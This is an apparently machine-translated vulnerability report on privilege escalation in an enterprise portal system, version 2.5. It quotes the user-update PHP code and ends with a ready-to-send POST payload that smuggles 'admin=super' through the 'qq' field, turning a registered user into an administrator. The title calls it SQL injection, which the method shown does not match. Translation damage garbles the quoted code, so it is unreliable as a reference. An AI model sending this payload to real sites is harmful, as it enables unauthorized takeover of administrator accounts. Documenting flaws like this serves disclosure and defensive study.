Cicada-known Enterprise Portal system v2. 5 sql injection to admin-vulnerability warning-the black bar safety net

ID MYHACK58:62201454275
Type myhack58
Reporter 佚名
Modified 2014-10-03T00:00:00


The problem is when the user modifies the information of the place


public function edit($account = ")


if(!$ account or RUN_MODE == 'front') $account = $this->app->user->account;

if($this->app->user->account == 'guest') $this->locate(inlink('login'));

if(! empty($_POST))





public function update($account)


/ If the user want to change his password. /

if($this->post->password1 != false)



if(dao::isError()) return false;

$password = $this->createPassword($this->post->password1, $account);

$this->post->set('password', $password);


$user = fixer::input('post')

->cleanInt('imobile, qq, zipcode')

->setDefault('admin', 'no')

->remove('ip, account, join, visits')

->removeIF(RUN_MODE != 'admin', 'admin')


return $this->the dao->update(TABLE_USER)

->data($user, $skip = 'password1,password2')


->batchCheck($this->config->user->require->edit, 'notempty')

->check('email', 'email')

->check('email', 'unique', "account!='$ account'")

->checkIF($this->post->gtalk != false, 'gtalk', 'email')




fixer this class of code is a bit long it is not posted, see above code can also probably understand it the role of..

Ordinary users and administrators is in one table, the difference is that the admin field.

In short we post the data to do a foreach and then into the updata

Of course he has to remove the admin, but this is too good to bypass.

Directly see the use of it~

Registered users after came to

http://localhost/user-edit.html 修改 资料

The modified package

post the following data

realname=aaaaaa&email=a%40qqqq. com&password1=&password2=&company=&address=&zipcode=&mobile=&phone=&qq%3D1,admin=super&gtalk=

You can elevate to become administrators.